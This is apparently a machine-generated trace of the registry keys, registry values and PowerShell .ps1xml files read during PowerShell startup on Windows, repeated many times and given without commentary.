HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
